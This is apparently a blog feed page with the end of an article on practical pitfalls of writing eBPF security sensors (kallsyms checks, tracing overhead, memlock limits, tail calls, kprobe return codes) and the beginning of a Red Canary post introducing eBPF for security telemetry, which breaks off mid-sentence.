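| |     if (has_wrapper) {
| |         const mock_regs_t *inner =
| |             (const mock_regs_t *)(uintptr_t)ARG0(ctx);
| |         if (!inner)
| |             return 0;
| |         return ARG0(inner);
| |     }
| |     return ARG0(ctx);
| | }
| | ```
| |
| | Here `has_wrapper` is a runtime flag only to keep the sketch short. In
| | practice it would more likely be another compile-time switch, which is how
| | you end up with one build per architecture and kernel family.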
| |
| | For the symbol name problem, it comes back to run early and run often. It's
| | often worth spinning up a VM of a few of the kernels you're targeting and
| | double checking that the locations you're hooking are indeed in
| | `/proc/kallsyms`. Sometimes you'll find the functions you were looking at don't
| | exist in different versions, or have been renamed and relocated. I recommend
| | getting comfortable with Bootlin's Elixir cross referencer (but you still need
| | to run and see, because distros do their own backports which won't match what's
| | in the mainline cross referencer).
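| |
| | That check is easy to script. Below is a minimal userspace C sketch that
| | scans a kallsyms-style file for a symbol and reports whether it exists
| | as-is or only under a compiler-renamed variant. `find_symbol` and
| | `enum sym_status` are hypothetical names, and the sketch assumes renamed
| | symbols look like the original name followed by a dot and a suffix.
| |
| | ```c
| | #include <stdio.h>
| | #include <string.h>
| |
| | enum sym_status { SYM_MISSING = 0, SYM_EXACT = 1, SYM_SUFFIXED = 2 };
| |
| | /* Scan `path` (normally /proc/kallsyms) for `name`. Lines look like
| |  * "ffffffff81000000 T symbol_name [module]". Returns SYM_EXACT on an
| |  * exact match, SYM_SUFFIXED if only variants such as "name.part.0"
| |  * exist, and SYM_MISSING otherwise or if the file can't be opened. */
| | static enum sym_status find_symbol(const char *path, const char *name)
| | {
| |     if (!path || !name)
| |         return SYM_MISSING;
| |
| |     FILE *f = fopen(path, "r");
| |     if (!f)
| |         return SYM_MISSING;
| |
| |     enum sym_status status = SYM_MISSING;
| |     size_t name_len = strlen(name);
| |     char line[512], addr[64], type, sym[256];
| |
| |     while (fgets(line, sizeof(line), f)) {
| |         if (sscanf(line, "%63s %c %255s", addr, &type, sym) != 3)
| |             continue;
| |         if (strcmp(sym, name) == 0) {
| |             status = SYM_EXACT;
| |             break;
| |         }
| |         /* remember a renamed variant, but keep looking for an exact hit */
| |         if (strncmp(sym, name, name_len) == 0 && sym[name_len] == '.')
| |             status = SYM_SUFFIXED;
| |     }
| |     fclose(f);
| |     return status;
| | }
| | ```
| |
| | Running `find_symbol("/proc/kallsyms", "tcp_close")` on each target kernel
| | before shipping tells you which probe points need a fallback.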
| +-
|
| +-**- Running BPF programs as intended involves magic. -**-
| |
| | -...- Problem -...-
| |
| | If you use libbcc, libbpf, bpftrace, or any other high-level BPF tools
| | you'll quickly notice that they do a lot of magic for you. BCC (the Python
| | interface) will more or less rewrite your programs for you so they work on your
| | host system. You'll end up getting error messages on code that the library
| | wrote for you. They also help you get around CO-RE limitations by compiling on
| | the host, and using different tricks and kludges to get the same program code
| | to operate in many environments as cleanly as possible. This doesn't help a ton
| | when you need to build and distribute actual raw BPF programs in their own ELF
| | file.
| |
| | These libraries are also pretty convoluted. There's a lot of overlap in
| | maintainers between these libraries and the people working on BPF in the
| | kernel, so documenting the interactions isn't a priority. But you don't
| | actually need all the stuff these libraries are doing. After a while,
| | especially with the rewriting, you'll find yourself wanting to write and load
| | pure BPF C code. Here's a snippet of a map I put together when trying to figure
| | out what syscalls were actually being made when libbpf loaded a program.
| |
| | ```
| | KProbe
| | |-> bpf_attach_kprobe()
| | |-> bpf_attach_probe()
| | |-> bpf_try_perf_event_open_with_probe()
| | |-> bpf_find_probe_type()
| | |-> bpf_get_retprobe_bit()
| | |-> syscall(__NR_perf_event_open)
| | |-> create_probe_event()
| | |-> enter_mount_ns()
| | |-> setns()
| | |-> exit_mount_ns()
| | |-> setns()
| | |-> bpf_attach_tracing_event()
| | |-> ioctl( PERF_EVENT_IOC_SET_BPF )
| | |-> ioctl( PERF_EVENT_IOC_ENABLE )
| | |-> bpf_close_perf_event_fd()
| | |-> ioctl( PERF_EVENT_IOC_DISABLE )
| | ```
| |
| | These libraries are also GPL, which means your userspace program would end up
| | being licensed under GPL and not just your BPF programs. As great as this is
| | for users, if you work for a company that likes to make money you might not be
| | allowed to touch GPL. It might even be in your contract.
| |
| | -...- Solution -...-
| |
| | If you're writing complex BPF programs for security, you'll probably want to
| | write it in C without the "help" of something like BCC. You'll also want a bit
| | more control and transparency when loading and attaching your programs. In my
| | experience, libbpf wasn't great at cleaning up after itself and it got
| | frustrating.
| |
| | Use a clean, simple library built from the ground up for loading BPF in your
| | language of choice. For Rust, `aya`[16] is a good one, and I worked on
| | `oxidebpf`[0]. Golang also has some good options. One common theme of these
| | projects is the amount of effort that went into reverse engineering the
| | undocumented program loading logic and reimplementing it. Take advantage of
| | that work and use it to load your programs. They're also permissively licensed!
| +-
|
| +-**- Speed kills. -**-
| |
| | -...- Problem -...-
| |
| | After getting into BPF, you may benchmark a few of your programs and be
| | surprised at how much faster BPF is than what you've been using before, like
| | audit. This makes it very tempting to trace and probe more than you probably
| | should. For example, if you want to trace socket closes you may be tempted to
| | put a kprobe on the `close` syscall. This syscall is called all the time, and
| | probing it will slow your system down unnecessarily. Most of the messages will
| | be discarded since you only care about sockets. There are plenty of other
| | interesting areas that can't be reasonably instrumented due to the performance
| | impact.
| |
| | -...- Solution -...-
| |
| | Trace only what you need, and scope it down as much as possible. Going back to
| | the `close` example, you'd be better off probing somewhere downstream where the
| | individual `tcp_close` or `udp_lib_close` functions are called.
| |
| | ```c
| | struct proto tcp_prot = {
| |     // ...
| |     .close = tcp_close,
| |     // ...
| | };
| | EXPORT_SYMBOL(tcp_prot);
| |
| | struct proto udp_prot = {
| |     // ...
| |     .close = udp_lib_close,
| |     // ...
| | };
| | EXPORT_SYMBOL(udp_prot);
| | ```
| |
| | Brendan Gregg's book[7], again, has a great table that shows the overall
| | performance impact of tracing different points in the kernel. You could also
| | just reason intuitively about how often you think each area you want to probe
| | is exercised. The more commonly a code path is executed, the more expensive it
| | will be to probe it.
| |
| | Even after doing your best to scope down and optimize your BPF programs, you'll
| | probably want to run benchmarks as you tweak things to see what performs best
| | in your target environment. Flamegraphs[13] are a great way to see where most
| | of your overhead is coming from, especially if combined with a benchmarker like
| | UnixBench[14]. The results may surprise you.
| |
| | I'd also recommend processing BPF events in batches. You'll probably be sending
| | out a lot of information through maps that needs to be read from userspace. If
| | you're getting information that's too big for the stack, the information will
| | be sent in chunks that need to be reconstructed in userspace. It's definitely
| | possible to loop a blocking poll+read on the perfmap or BPF ring buffer, but
| | doing so will result in significant overhead. You're much better off letting
| | the buffers fill a bit, and processing them in batches (batch process, don't
| | stream process). Doing that netted me significant performance gains in
| | benchmarks for the BPF programs I write at work.
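| |
| | One way to get that batching with a perf buffer (a sketch under my own
| | assumptions, not necessarily how the programs mentioned above do it) is to
| | ask the kernel to wake the reader only every N events instead of on every
| | event. `wakeup_events` is a real `perf_event_attr` field; the helper name
| | `init_batched_attr` and whatever batch size you pick are made up for
| | illustration.
| |
| | ```c
| | #include <linux/perf_event.h>
| | #include <string.h>
| |
| | /* Hypothetical helper: fill in the attr for a per-CPU BPF output buffer
| |  * whose reader is only woken once `batch` events have piled up. */
| | static void init_batched_attr(struct perf_event_attr *attr, __u32 batch)
| | {
| |     memset(attr, 0, sizeof(*attr));
| |     attr->size = sizeof(*attr);
| |     attr->type = PERF_TYPE_SOFTWARE;
| |     attr->config = PERF_COUNT_SW_BPF_OUTPUT;
| |     attr->sample_type = PERF_SAMPLE_RAW;
| |     attr->sample_period = 1;
| |     attr->wakeup_events = batch; /* 1 would mean "wake on every event" */
| | }
| | ```
| |
| | Pass the result to `perf_event_open(2)` for each CPU as usual, then drain
| | everything that's in the ring on each wakeup. Pair it with a poll timeout so
| | a quiet system doesn't sit on a half-full batch forever.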
| +-
|
| +-**- Don't Panic. -**-
| |
| | -...- Problem -...-
| |
| | BPF programs will generally live as long as something holds a file descriptor
| | that points to them. However, sometimes you need to manually clean up after
| | them (such as when using `debugfs`). If your userspace program crashes or
| | panics, things may not get cleaned up properly. This can lead to all sorts of
| | problems when you restart your probes, such as receiving duplicate events.
| |
| | If you're building short-lived, one-off tools, this is less of a concern. But
| | if you're managing several probes as part of a long-lived monitoring daemon
| | then this is something you need to be careful with.
| |
| | -...- Solution -...-
| |
| | Make sure you design the userspace component of the BPF program to keep your
| | programs alive for as long as you'll need them. Gracefully handle all errors in
| | the thread that keeps your BPF programs alive and make sure you clean up after
| | yourself in the event of failure or shutdown. Keep in mind that many older BPF
| | tools are built around short-lived programs, meant for things like `bpftrace`
| | or production debugging.
| +-
|
| +-**- Know your limits. -**-
| |
| | -...- Problem -...-
| |
| | Your program will have instructions and will probably use maps. These take up
| | space, which the BPF syscall will handily memlock for you. On many distros,
| | this is fine. On others, however, the default memlock ulimit is quite low[15].
| | See the following output of `ulimit -l` on various distributions.
| |
| | ```
| | vagrant@ubuntu2004:~$ ulimit -l
| | 65536
| | [vagrant@centos7 ~]$ ulimit -l
| | 64
| | vagrant@opensuse15:~> ulimit -l
| | 64
| | ```
| |
| | If you can't memlock enough memory to fit your instructions and maps, you'll
| | get rejected with cryptic error messages (often just `EPERM`, which reads like
| | a permissions problem rather than a memory limit).
| |
| | -...- Solution -...-
| |
| | Calculate the amount of memory your programs and maps will need, and check the
| | memlock limits on your target systems. You may be fine, or you may need to
| | raise it first. Some libraries (like the one we wrote![0]) can try to take care
| | of this for you.
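| |
| | As a rough sketch of the "raise it first" step (plain libc calls, not the
| | code from [0]), a loader can check `RLIMIT_MEMLOCK` and bump it before
| | loading anything. The helper name `raise_memlock` is made up for this
| | example. Note that `ulimit -l` prints KiB while `setrlimit` takes bytes, so
| | the `64` above is 65536 bytes.
| |
| | ```c
| | #include <sys/resource.h>
| |
| | /* Hypothetical helper: make sure at least `want` bytes can be memlocked.
| |  * Returns 0 on success, -1 if the limit could not be read or raised. */
| | static int raise_memlock(rlim_t want)
| | {
| |     struct rlimit lim;
| |
| |     if (getrlimit(RLIMIT_MEMLOCK, &lim) != 0)
| |         return -1;
| |     if (lim.rlim_cur == RLIM_INFINITY || lim.rlim_cur >= want)
| |         return 0; /* already enough headroom */
| |
| |     lim.rlim_cur = want;
| |     if (lim.rlim_max != RLIM_INFINITY && lim.rlim_max < want)
| |         lim.rlim_max = want; /* raising the hard limit needs privileges */
| |     return setrlimit(RLIMIT_MEMLOCK, &lim);
| | }
| | ```
| |
| | Call it once at startup with the total you calculated for your programs and
| | maps. If it fails, report that clearly instead of letting the load error
| | speak for itself.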
| +-
|
| +-**- Tail calls aren't guaranteed. -**-
| |
| | -...- Problem -...-
| |
| | Think of tail calls like the BPF equivalent of `execve`, except less powerful.
| | It'll start running a new probe, with the original context argument, and
| | replace everything you were previously doing. You can't provide it with custom
| | arguments, and the tail call needs to pass the verifier independently. This
| | means if you want to communicate between tail calls you'll need to use maps.
| | You're also limited to chaining 33 tail calls in a single execution; after that
| | the tail call will simply fall through.
| |
| | You can't call into another program with a tail call directly, either. You need
| | to reference an index in a tail call program map (a type of BPF map) which
| | needs to be set from userspace. For example, if you want to tail call from
| | `prog_a()` into `prog_b()`, you'll need to load `prog_a()` and `prog_b()`
| | first. At this point if `prog_a()` fires, the tail call into `prog_b()` will
| | fizzle. Then, from userspace, you need to update a map to say "`prog_b()` is at
| | index 5, if anyone tries to tail call into index 5, send them to `prog_b()`."
| | Tracking and maintaining all these indexes can be cumbersome.
| |
| | And there's not always a guarantee that the tail call will fire. You could
| | reach an execution limit, or a memory limit, or some other weird verifier edge
| | case that prevents the tail call from firing. Your programs need to handle this
| | gracefully.
| |
| | -...- Solution -...-
| |
| | First, you'll have to write your tail calls as though they were independent
| | programs. Think of designing each one to grab a different bit of information
| | you're looking for. If you find yourself re-calculating the same things in each
| | program or otherwise need to communicate across calls, store and retrieve
| | information from a map.
| |
| | For managing indexes, use an enum for your tail calls and reference that from
| | your userspace application. For example, have an `enum tail_calls { PROBE_A,
| | PROBE_B };` and then reference it from inside your programs and when loading
| | the program map from userspace. The file descriptor for `probe_a()` goes at
| | index `PROBE_A`, and so on. If you want to call into `probe_a()`, you get there
| | by asking for `PROBE_A` with `bpf_tail_call(ctx, &tail_call_table, PROBE_A);`.
| |
| | Your program should also have a plan for what happens if the tail call doesn't
| | go off. Do you want to send up an error? Ignore it? Send up a message that
| | execution was completed? Something else? For example, if you're using recursive
| | tail calls to read a string value you may want to return a message that says
| | you hit your tail call limit before you finished reading the string.
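| |
| | Put together, the BPF side of that might look like the sketch below. The
| | names `probe_a`, `probe_b`, `tail_call_table`, `PROBE_A` and `PROBE_B` come
| | from the text above; `TAIL_CALL_MAX`, the section names, and the libbpf-style
| | map definition are my assumptions, so adapt them to whatever loader you use.
| | It builds with clang's BPF target and the libbpf headers.
| |
| | ```c
| | #include <linux/bpf.h>
| | #include <linux/ptrace.h>
| | #include <bpf/bpf_helpers.h>
| |
| | /* Shared between the BPF side and the userspace loader. */
| | enum tail_calls { PROBE_A, PROBE_B, TAIL_CALL_MAX };
| |
| | /* Program array: userspace stores each program's fd at its enum index. */
| | struct {
| |     __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
| |     __uint(max_entries, TAIL_CALL_MAX);
| |     __uint(key_size, sizeof(__u32));
| |     __uint(value_size, sizeof(__u32));
| | } tail_call_table SEC(".maps");
| |
| | SEC("kprobe/probe_b") /* placeholder section name */
| | int probe_b(struct pt_regs *ctx)
| | {
| |     return 0;
| | }
| |
| | SEC("kprobe/probe_a") /* placeholder section name */
| | int probe_a(struct pt_regs *ctx)
| | {
| |     bpf_tail_call(ctx, &tail_call_table, PROBE_B);
| |     /* Only reached if the tail call did not fire: the slot is empty or
| |      * the chain limit was hit. Report it, ignore it, your call. */
| |     return 0;
| | }
| |
| | char LICENSE[] SEC("license") = "GPL";
| | ```
| |
| | Until userspace writes the fd for `probe_b()` into slot `PROBE_B`, the call
| | in `probe_a()` falls straight through to the code after it.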
| +-
|
| +-**- You can't just return what you want. -**-
| |
| | Alternatively, you're on your own with error handling.
| |
| | -...- Problem -...-
| |
| | This one was a problem that we didn't even realize we had because it was so
| | subtle. In C it's pretty customary to return `0` on success and `-1` (or some
| | other negative error code) in the event of a failure. The actual returned value
| | is usually written to a buffer or some other pointer given as a function
| | parameter. You check the return code for success or failure and take actions
| | appropriately (in theory). While writing BPF programs in C, especially kprobes,
| | you might be tempted to follow this pattern. After all, it makes sense. The
| | actual value you return is sent out through perf or written into a map so
| | userspace can grab it, so the return value of the probe itself should be `0` to
| | indicate success or `-1` to indicate failure, right? Just like every other C
| | program? Wrong! For program types other than kprobes (remember, BPF is just an
| | execution environment) it's more obvious that the return codes have special
| | meaning. For example, XDP programs have explicit return codes to drop, pass,
| | or re-process packets.
| |
| | For kprobes, `return 0;` means "I'm done with this kprobe, you can move on."
| | You indicate that you want to keep the probe hanging around with _literally any
| | other return code_ (including `return -1;`). That's probably not what you
| | want. Take a look at this function from the kprobe handler in [18]:
| |
| | ```c
| | /* Kprobe profile handler */
| | static int
| | kprobe_perf_func(struct trace_kprobe *tk, struct pt_regs *regs)
| | {
| |     // ...
| |     if (bpf_prog_array_valid(call)) {
| |         // ...
| |         ret = trace_call_bpf(call, regs);
| |         // ...
| |         if (!ret)
| |             return 0;
| |     }
| |
| |     head = this_cpu_ptr(call->perf_events);
| |     if (hlist_empty(head))
| |         return 0;
| |
| |     dsize = __get_data_size(&tk->tp, regs);
| |     __size = sizeof(*entry) + tk->tp.size + dsize;
| |     size = ALIGN(__size + sizeof(u32), sizeof(u64));
| |     size -= sizeof(u32);
| |
| |     entry = perf_trace_buf_alloc(size, NULL, &rctx);
| |     if (!entry)
| |         return 0;
| |
| |     entry->ip = (unsigned long)tk->rp.kp.addr;
| |     memset(&entry[1], 0, dsize);
| |     store_trace_args(&entry[1], &tk->tp, regs, sizeof(*entry), dsize);
| |     perf_trace_buf_submit(entry, size, rctx, call->event.type, 1, regs,
| |                           head, NULL);
| |     return 0;
| | }
| | ```
| |
| | There are two things you should notice in that snippet: the line `ret =
| | trace_call_bpf(call, regs);` and the check `if (!ret) return 0;`. That means if
| | `trace_call_bpf()` returns _anything but `0`_ (including `-1`) we go through
| | the remainder of the function: buffer allocation, trace argument storage, and
| | so on. We can grab the internals of that function at [19]:
| |
| |
| | ```c
| | /**
| |  * trace_call_bpf - invoke BPF program
| |  * @call: tracepoint event
| |  * @ctx: opaque context pointer
| |  *
| |  * kprobe handlers execute BPF programs via this helper.
| |  * Can be used from static tracepoints in the future.
| |  *
| |  * Return: BPF programs always return an integer which is interpreted by
| |  * kprobe handler as:
| |  * 0 - return from kprobe (event is filtered out)
| |  * 1 - store kprobe event into ring buffer
| |  * Other values are reserved and currently alias to 1
| |  */
| | unsigned int trace_call_bpf(struct trace_event_call *call, void *ctx)
| | {
| |     unsigned int ret;
| |
| |     // ...
| |
| |     /*
| |      * ...
| |      */
| |     ret = BPF_PROG_RUN_ARRAY(call->prog_array, ctx, bpf_prog_run);
| |
| |     // ...
| |
| |     return ret;
| | }
| | ```
| |
| | As you can see, this is the function that actually invokes the BPF program
| | attached to the kprobe. It gets `ret`, which it returns, from
| | `BPF_PROG_RUN_ARRAY()`. The documentation on this function is also pretty
| | explicit, which is nice. When we return `0`, we've returned from the kprobe and
| | don't need to keep any details about it hanging around. When we return `1`
| | (which anything besides `0` aliases to) we store information about the kprobe
| | in a ringbuffer for later.
| |
| | -...- Solution -...-
| |
| | The solution here is to always `return 0;` in your kprobes, unless you have an
| | explicit need to `return 1;`. If you want to know if your kprobe failed or is
| | in some incomplete state, you'll need to architect your message-passing to
| | handle that case. For example, you might want to include a success code flag in
| | the struct(s) you pass through a perfmap which you can check for failure. Or
| | you might want to build your system around a best-effort event reconstruction
| | for more complicated returns involving multiple messages. In any case, you'll
| | have to engineer your error checking and handling independently of the BPF VM
| | system. Those return codes are reserved, you gotta make your own.
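| |
| | Here's a minimal sketch of the "success code flag" idea. Every name in it
| | (`event_status`, `struct event`, `handle_event`) is hypothetical; the point is
| | only that the probe records what went wrong in the message itself and still
| | does `return 0;`, while userspace decides what to do with the status.
| |
| | ```c
| | #include <stdint.h>
| | #include <stdio.h>
| |
| | /* Hypothetical layout shared by the probe and the userspace reader. */
| | enum event_status { EVENT_OK, EVENT_TRUNCATED, EVENT_READ_FAILED };
| |
| | struct event {
| |     uint32_t status; /* set by the probe, which itself still returns 0 */
| |     uint32_t pid;
| |     char     comm[16];
| | };
| |
| | /* Userspace side: returns 1 if the event is usable, 0 if it is dropped. */
| | static int handle_event(const struct event *ev)
| | {
| |     if (ev->status == EVENT_READ_FAILED) {
| |         fprintf(stderr, "pid %u: probe could not read its data\n",
| |                 (unsigned)ev->pid);
| |         return 0;
| |     }
| |     if (ev->status == EVENT_TRUNCATED)
| |         fprintf(stderr, "pid %u: event is incomplete\n",
| |                 (unsigned)ev->pid);
| |     return 1;
| | }
| | ```
| |
| | The probe fills in `status` before sending the struct out through perf or a
| | map, so a failure travels with the data instead of through the return code.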
| +-
+-
+-#- Wow, that looks hard. Can you summarize it for me? -#-
|
| Certainly! BPF is really good at getting visibility (almost) anywhere in the
| entire system, it allows dynamic reinstrumentation, can be made container
| aware, is faster than alternatives, and is (usually) safe to run as long as you
| can load it. Consider using BPF if any of the following apply to you:
|
| - You have the in-house resources and expertise to build and maintain a
| long-lived BPF telemetry source.
|
| - You only want to use BPF for live debugging or other short-lived, one-off use
| cases such as bpftrace.
|
| - You're lucky enough to only have to support a single kernel version.
|
| - You don't really care if the project succeeds, you just want to get experience
| with BPF (this might legitimately apply in R&D orgs).
|
| If you don't have the resources and need to support a wide range of kernels,
| you might be better off looking for an alternative (there are many free and
| open source options thanks to GPL), or paying someone else to build it for you.
|
| Long running BPF programs for security are a relatively new use case. The
| tooling around this use case is getting better all the time, but there's still
| a lot to consider before diving in.
+-
+------[references]--------------------------------------------------------------------------+
| [0]: [https://github.com/redcanaryco/oxidebpf] |
| [1]: Will go public Soon(TM) at |
| [https://github.com/redcanaryco/linux-kernel-cloud-component-builder] |
| [2]: [https://github.com/redcanaryco/redcanary-ebpf-sensor] |
| [4]: [https://lwn.net/Articles/870269/] |
| [5]: [https://lwn.net/Articles/812503/] |
| [6]: [https://elixir.bootlin.com/linux/latest/source/kernel/trace/bpf_trace.c#L646] |
| [7]: [https://www.brendangregg.com/bpf-performance-tools-book.html] |
| [8]: [https://github.com/vbpf/ebpf-verifier] |
| [9]: [https://github.com/iovisor/bcc/issues] |
| [10]: [https://en.wikipedia.org/wiki/0x10c] |
| [11]: [https://lwn.net/Articles/752047/] |
| [12]: [https://github.com/redcanaryco/redcanary-ebpf-sensor/blob/main/src/programs.c#L393] |
| [13]: [https://github.com/brendangregg/FlameGraph/] |
| [14]: [https://github.com/kdlucas/byte-unixbench] |
| [15]: [https://linux.die.net/man/5/limits.conf] |
| [16]: [https://github.com/aya-rs/aya] |
| [17]: [https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=BPF] |
| [18]: [https://elixir.bootlin.com/linux/latest/source/kernel/trace/trace_kprobe.c#L1568] |
| [19]: [https://elixir.bootlin.com/linux/latest/source/kernel/trace/bpf_trace.c#L95] |
+--------------------------------------------------------------------------------------------+
</code></pre></div></div>Friday OrtizThis article was originally written for tmp.0ut volume 2 and is available here: https://tmpout.sh/2/4.html. Due to the unique (read: badass) format of the zine, it is replicated here as plaintext.eBPF for security: a beginner’s guide2022-01-04T05:00:00+00:002022-01-04T05:00:00+00:00https://ortiz.sh/ebpf/2022/01/04/eBPF-FOR-BEGINNINERS<p><strong>This post was written for Red Canary and originally appeared on their site
<a href="https://redcanary.com/blog/ebpf-for-security/">here</a>.</strong></p>
<p>Red Canary has started to incorporate
<a href="https://en.wikipedia.org/wiki/Berkeley_Packet_Filter">eBPF</a> into our Linux
sensor. We wanted to explain, at a high level, what eBPF is and how it helps us
protect our customers. We’ll start by describing the shortcomings we’ve
experienced in gathering security telemetry and then explain how eBPF helps us
solve these shortcomings. We’ll close by reviewing some of the challenges we
faced in building eBPF support into our
<a href="https://redcanary.com/products/managed-detection-and-response/">MDR</a> product,
and how we overcame them. We expect to offer Red Canary customers full eBPF
telemetry support in the coming months, which will be announced in upcoming
release notes.</p>
<h2 id="whats-the-problem">What’s the problem?</h2>
<p>In order to detect suspicious or malicious events, we need to gather a lot of
telemetry from a running system. We use this telemetry to understand what
system calls are happening, what processes are running, and how the system is
behaving. Some examples of telemetry we gather are process start events,
network connections, and namespace changes. There are <a href="https://redcanary.com/blog/linux-security-testing/">many
ways</a> we can gather this
information on a <a href="https://redcanary.com/blog/linux-101/">Linux system</a>, but
they are not all created equal. For example, we can gather information on
processes opening files by regularly scanning <code class="language-plaintext highlighter-rouge">procfs</code> for open file
descriptors. However, depending on our intervals, we might miss files that are
opened and closed quickly. Or we could note down the file descriptor, only to
have it point at a different file by the time we read it.</p>
<p>The ideal place to gather information on these events is directly inside the
kernel. Traditionally, this can be done with the <a href="https://wiki.archlinux.org/title/Audit_framework">Linux Auditing
subsystem</a> or with a <a href="https://sysprog21.github.io/lkmpg/#what-is-a-kernel-module">Linux
kernel module
(LKM)</a>. An
alternative that’s quickly gaining traction is to gather this telemetry with
eBPF, which excels at high-performance kernel instrumentation and improved
observability.</p>
<h2 id="what-is-ebpf-and-why-is-it-useful">What is eBPF and why is it useful?</h2>
<p><a href="https://ebpf.io/">Berkeley Packet Filter</a> is a Linux kernel subsystem that
allows a user to run a limited set of instructions on a virtual machine running
in the kernel. It is divided between classic BPF (cBPF) and extended BPF (eBPF,
or simply BPF). The older cBPF was limited to observing packet information,
while the newer eBPF is much more powerful, allowing a user to do things such
as modify packets, change syscall arguments, modify userspace applications, and
more.</p>
<h3 id="safer-than-kernel-modules">Safer than kernel modules</h3>
<p>Why is this useful? Because normally if we want to run arbitrary code in the
kernel, we would need to load in a kernel module. Putting aside the security
implications for a moment, running code in the kernel is dangerous and error
prone. If you make a mistake in a normal application, it crashes. If you make a
mistake in kernel code, the computer crashes. Security is about managing
business risk, so a security tool isn’t very useful if it brings down
production. BPF offers us a safe alternative, while providing nearly the same
amount of power. You can run arbitrary code in a kernel sandbox and collect
information without the risk of breaking the host.</p>
<p>You can also think of BPF as a web application, whereas a kernel module is a
standalone application. Which one do you trust more: visiting a website or
downloading and running an application? Visiting a website is safer; a web
application runs in a sandbox and can’t easily do as much damage to your
machine as a downloaded application.</p>
<h3 id="more-efficient-than-auditd">More efficient than AuditD</h3>
<p><a href="https://capsule8.com/blog/auditd-what-is-the-linux-auditing-system/">This
post</a>
gives an excellent overview of <a href="https://linux.die.net/man/8/auditd">AuditD</a>’s
strengths and weaknesses, but let’s compare it directly against BPF.</p>
<p>AuditD is relatively slow when it comes to collecting information, and incurs a
non-negligible performance penalty on the system under audit. BPF offers us a
significant performance advantage: we can perform some filtering, collection,
and analysis within the kernel. Moving information from inside the kernel to
outside the kernel is a relatively slow process (details of which are outside
the scope of this post). The more work, collection, and analysis we can do
inside the kernel, the faster our system will run.</p>
<p>AuditD is also relatively inflexible, whereas BPF gives us great flexibility.
AuditD telemetry is limited to the events that the tool is designed to
generate, and what we can configure it to tell us about. With BPF, we can
instrument and inspect any point in the kernel we want to. We can look at
specific code paths, examine function arguments, and generally collect as much
information as we need to inform decision making.</p>
<p>BPF also allows many simultaneous consumers, allowing us to happily live
alongside any other programs that take advantage of BPF. By contrast, AuditD
can only be used by one program at a time. Once events are consumed from
AuditD, they’re gone.</p>
<h2 id="how-do-i-collect-telemetry-from-ebpf">How do I collect telemetry from eBPF?</h2>
<p>In order to get security telemetry from BPF, we need two main components:</p>
<ol>
<li>the BPF programs themselves, to gather information from the kernel and
expose it in a useful format</li>
<li>a way to load and interact with these BPF programs</li>
</ol>
<p>Red Canary’s Research & Development team has built and released both of these
components as free open source software. With these components in place, anyone
can start to move away from relying on AuditD and Linux kernel modules to
gather security telemetry.</p>
<h3 id="red-canarys-ebpf-sensor">Red Canary’s eBPF sensor</h3>
<p>The
<a href="https://github.com/redcanaryco/redcanary-ebpf-sensor">redcanary-ebpf-sensor</a>
is the set of BPF programs that actually gather security-relevant event data
from the Linux kernel. The BPF programs are combined into a single ELF file
from which we can selectively load individual probes, depending on the
operating system and kernel version we’re running on. The probes insert
themselves at various points in the kernel (such as the entrypoint and return
of the <code class="language-plaintext highlighter-rouge">execve</code> system call) and gather information on the call and its
context. This information is then turned into a telemetry event, which is sent
to userspace through a <code class="language-plaintext highlighter-rouge">perf</code> buffer.</p>
<p>By having multiple probes in the same ELF binary, we can take advantage of
newer kernel features (such as the <code class="language-plaintext highlighter-rouge">read_str</code> family of BPF functions), or probe
newer syscalls (such as <code class="language-plaintext highlighter-rouge">clone3</code>) while retaining backwards compatibility with
older kernels. This lets us build a Compile-Once, Run-Most-Places BPF sensor
package.</p>
<h3 id="oxidebpf">oxidebpf</h3>
<p><a href="https://github.com/redcanaryco/oxidebpf"><code class="language-plaintext highlighter-rouge">oxidebpf</code></a> is a Rust library that
manages eBPF programs. The goal of <code class="language-plaintext highlighter-rouge">oxidebpf</code> is to provide a simple interface
for managing multiple BPF program versions in a Compile-Once, Run-Most-Places
way. For example, here’s how easy it is to build a probe group that always attaches to
<code class="language-plaintext highlighter-rouge">clone</code>, and also attaches to <code class="language-plaintext highlighter-rouge">clone3</code> when it exists on the target system.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="k">mut</span> <span class="n">program_group</span> <span class="o">=</span> <span class="nn">ProgramGroup</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nb">None</span><span class="p">);</span>
<span class="n">program_group</span><span class="nf">.load</span><span class="p">(</span>
    <span class="n">program_blueprint</span><span class="p">,</span>
    <span class="nd">vec!</span><span class="p">[</span><span class="nn">ProgramVersion</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nd">vec!</span><span class="p">[</span>
        <span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
            <span class="s">"test_program_clone"</span><span class="p">,</span>
            <span class="o">&</span><span class="p">[</span><span class="s">"sys_clone"</span><span class="p">],</span>
        <span class="p">)</span>
        <span class="nf">.syscall</span><span class="p">(</span><span class="kc">true</span><span class="p">),</span>
        <span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
            <span class="s">"test_program_clone3"</span><span class="p">,</span>
            <span class="o">&</span><span class="p">[</span><span class="s">"sys_clone3"</span><span class="p">],</span>
        <span class="p">)</span>
        <span class="nf">.optional</span><span class="p">(</span><span class="kc">true</span><span class="p">)</span>
        <span class="nf">.syscall</span><span class="p">(</span><span class="kc">true</span><span class="p">),</span>
    <span class="p">])]</span>
<span class="p">)</span><span class="o">?</span><span class="p">;</span>
</code></pre></div></div>
<p>Read our <a href="https://redcanary.com/blog/oxidebpf/">blog post</a> for a more detailed
overview of <code class="language-plaintext highlighter-rouge">oxidebpf</code>, along with a tutorial.</p>
<p><strong>Author’s Note: That blog post is also cross posted here:
<a href="https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF.html">https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF.html</a>.
The tutorial is not updated for oxidebpf versions >= 0.2.</strong></p>
<h3 id="coming-soon-a-gps-for-the-linux-kernel">Coming soon: a GPS for the Linux kernel</h3>
<p>One last thing we need to achieve Run-Most-Places is kernel offsets. To get
some of the information we want out of the kernel, we need to pull that
information out of kernel data structures. These structures are
not guaranteed to form a stable application binary interface (ABI) and can vary
across kernel versions and distributions. The typical way to solve this is to
build your BPF program on the host you’re targeting and resolve the structure
offsets locally. That doesn’t work well for ephemeral systems,
short-lived systems, or systems that can’t spare the resources to build and
rebuild sensors. Alternatively, newer kernels support BPF features that take
care of this for the developer, facilitating true Compile-Once, Run-Everywhere
